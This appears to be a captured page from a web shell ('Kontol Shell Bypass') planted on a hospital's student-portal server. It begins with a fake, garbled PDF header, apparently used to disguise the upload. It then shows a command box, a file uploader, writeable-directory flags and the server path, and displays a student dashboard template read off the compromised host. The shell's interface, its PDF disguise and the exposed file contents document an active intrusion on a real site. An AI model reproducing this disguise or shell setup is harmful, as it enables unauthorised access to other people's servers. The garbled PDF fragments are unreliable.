%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/student-panel/views_old/user/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/student-panel/views_old/user/dashboard.html
<div class="container-fluid">
    <div class="row">
        <div class="col-md-12">
            <div class="dashboard1">
                <div class="row">
				
					<div class="col-md-12" ng-if="CR.notifications.length">					
						<div class="alert alert-info alert-dismissible fade in">
							<!-- <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>						 -->
							<i class="fa fa-bell white" aria-hidden="true"></i> <strong>{{CR.notifications.length}} Notification!</strong> <span ng-bind-html="renderHtml(CR.notifications[0].msg)"></span>
							<a href="javascript;;" class="viewall" ng-if="CR.notifications.length>1 && !CR.viewAllNoti" ng-click="CR.viewAllNoti=true">View All</a>
                        </div>
                        
                        <div class="alert alert-info alert-dismissible fade in" ng-if="CR.viewAllNoti && i>0" ng-repeat="(i,r) in CR.notifications">
							<span ng-bind-html="renderHtml(r.msg)"></span>
						</div>
                    </div>	
                    
                    
						<!--<div class="col-md-4">
                        <div class="das-box">
                            <div class="row">
                                <div class="col-md-4 col-xs-4">
                                <div class="img dashboard-bg1">{{CR.noOfinProgress}}</div></div>
                                <div class="col-md-8 col-xs-8">
                                    <h4>Application in-Progress</h4>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <div class="col-md-4">
                        <div class="das-box">
                            <div class="row">
                                <div class="col-md-4 col-xs-4">
                                <div class="img dashboard-bg2">{{CR.noOfCompleted}}</div></div>
                                <div class="col-md-8 col-xs-8">
                                    <h4>Application Completed</h4>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="col-md-4">
                        <div class="das-box">
                            <div class="row">
                                <div class="col-md-4 col-xs-4">
                                <div class="img dashboard-bg3">{{CR.noOfIssueRaised}}</div></div>
                                <div class="col-md-8 col-xs-8">
                                    <h4>Issue Raised</h4>
                                </div>
                            </div>
                        </div>
                    </div>-->							
                    
                </div>									
            </div>
            
            <div class="dashboard">
                <div class="heading">
                    <h4>Application List</h4>
                    <p>List of applications initiated/processed </p>
                </div>
                <div class="table-responsive">          
                    <table class="table table-bordered">
                        <thead>
                            <tr>
                                <th>Application Name</th>
                                <th>System ID</th>
                                <th>Date</th>
                                <th>Application</th>
                                <th width="15%">Status</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr ng-repeat="r in CR.myApplications">
                                <td>{{r.plan}}</td>
                                <td>{{r.application_no}}</td>
                                <td>{{r.created}}</td>
                                <td>
                                    <table>
                                        <tr>
                                            <td>Fee:</td>
                                            <td width="10"></td>
                                            <td><i class="fa fa-inr" aria-hidden="true"></i>{{r.fee | number:2}}</td>
                                        </tr>
                                        <tr>
                                            <td>Paid</td>
                                            <td width="10"></td>
                                            <td><i class="fa fa-inr" aria-hidden="true"></i>{{r.feePaid | number:2}}</td>
                                        </tr>												
                                    </table>
                                </td>
                                
                                <td>
                                    <div ng-if="r.step_completed==3">
                                        <a href="javascript:;;" ng-click="goto('application', {id:r.id, id_type:'App'})">
                                            <button type="button" class="btn blue">Completed <i class="fa fa-download" aria-hidden="true"></i></button>
                                            <p class="step">View Application Form</p>
                                        </a>
                                    </div>
                                    <div ng-if="r.step_completed!=3">
                                        <button type="button" class="btn btn-danger" ng-click="goto('application', {id:r.id, id_type:'App'})">Complete Now <i class="fa fa-angle-right" aria-hidden="true"></i></button>
                                        <p class="step">Step {{r.step_completed}} out of 3 completed </p>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>



            <div class="dashboard" ng-if="CR.suggestedPlans.length">
                <div class="heading">
                    <h4>Suggested Application</h4>
                    <p>On the basis of your previous applications, list of suggested applications are given below</p>
                </div>
                <div class="table-responsive">          
                    <table class="table table-bordered">
                        <thead>
                            <tr>
                                <th>Application Name</th>
                                <th>Application Fee</th>
                                <th>Offer/Discount</th>
                                <th width="15%">Action</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr ng-repeat="r in CR.suggestedPlans">
                                <td>{{r.plan}}</td>
                                <td><i class="fa fa-inr" aria-hidden="true"></i>{{r.fee | number:2}}</td>
                                <td>
                                    <table>
                                        <tr ng-repeat="c in r.coupans">
                                            <td>{{c.title}}</td>
                                        </tr>
                                    </table>										
                                </td>
                                <td>
                                    <button type="button" class="btn green" ng-click="goto('application', {id:r.plan_id, id_type:'Plan'})">Apply Now <i class="fa fa-angle-right" aria-hidden="true"></i></button>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>						
        </div>
        
        <!-- <div class="col-md-12">
            <div class="alert alert-info alert-dismissible fade in">
            <i class="fa fa-check-square orange" aria-hidden="true"></i> You will be required to make a payment of INR 1200 online to complete your SUAT 2019-20 Application.
            </div>
        </div>					 -->
    </div>
</div>

Kontol Shell Bypass